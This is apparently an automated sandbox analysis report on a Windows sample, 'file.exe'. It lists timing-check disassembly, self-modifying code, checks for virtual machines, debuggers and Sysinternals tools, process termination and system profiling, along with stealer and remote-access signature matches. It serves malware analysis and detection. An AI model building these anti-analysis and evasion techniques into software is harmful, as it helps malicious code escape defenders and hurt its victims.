              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67831 second address: C6784A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F31h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7975A second address: C7975E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7975E second address: C79764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7AD95 second address: C7ADAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0B48B8DEE6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ADAC second address: C7ADC2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0B48765F2Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D7DF second address: C7D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F0B48B8DEE6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92ADE second address: C92AE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95D34 second address: C95D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95EF2 second address: C95EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95EF6 second address: C95F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F0B48B8DEF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95F8F second address: C95F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95F9D second address: C95FB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0B48B8DEE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FB0 second address: C95FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FB4 second address: C95FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FC7 second address: C95FCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95FCC second address: C9604B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0B48B8DEE8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D306Bh], edx 0x00000028 sub edx, dword ptr [ebp+1244E0F3h] 0x0000002e push 00000004h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F0B48B8DEE8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1B4Dh], edx 0x00000050 mov dword ptr [ebp+122D1D2Bh], edi 0x00000056 push 701DE064h 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e jmp 00007F0B48B8DEEEh 0x00000063 pop ecx 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9604B second address: C96051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98D82 second address: C98D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98D8D second address: C98D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9AC19 second address: C9AC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530029C second address: 53002A7 instructions: 0x00000000 rdtsc 0x00000002 mov si, 64A7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002A7 second address: 53002B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov di, 5384h 0x0000000e push edx 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002B8 second address: 53002BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002BE second address: 53002C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002C2 second address: 53002D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov dh, 74h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002D0 second address: 53002DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002DA second address: 530032E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0B48765F2Ah 0x00000008 or esi, 59C62368h 0x0000000e jmp 00007F0B48765F2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0B48765F36h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0B48765F37h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9FFB6E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9FFAB3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BA23E0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9FD646 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BB1D2E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: C31FFF instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-27321)
              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime, DecisionNodes (graph_0-27389)
              Source: C:\Users\user\Desktop\file.exe | API coverage: 4.2 %
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007C18A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C3910
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C1269
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C1250
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007CE210
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007C4B29
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007C4B10
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007CCBE0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007C23A9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007BDB99
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_007C2390
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007BDB80
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007CD530
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_007CDD30
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007B16B9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007B16A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_007D1BF0
              Source: file.exe, file.exe, 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157021332.00000000014B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2157021332.0000000001487000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
              Source: file.exe, 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26146)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26133)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25979)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26126)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25998)
              Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B4A60 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D6390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: +N;Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D2D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Mitre Att&ck Matrix (number in parentheses = matched signature count)

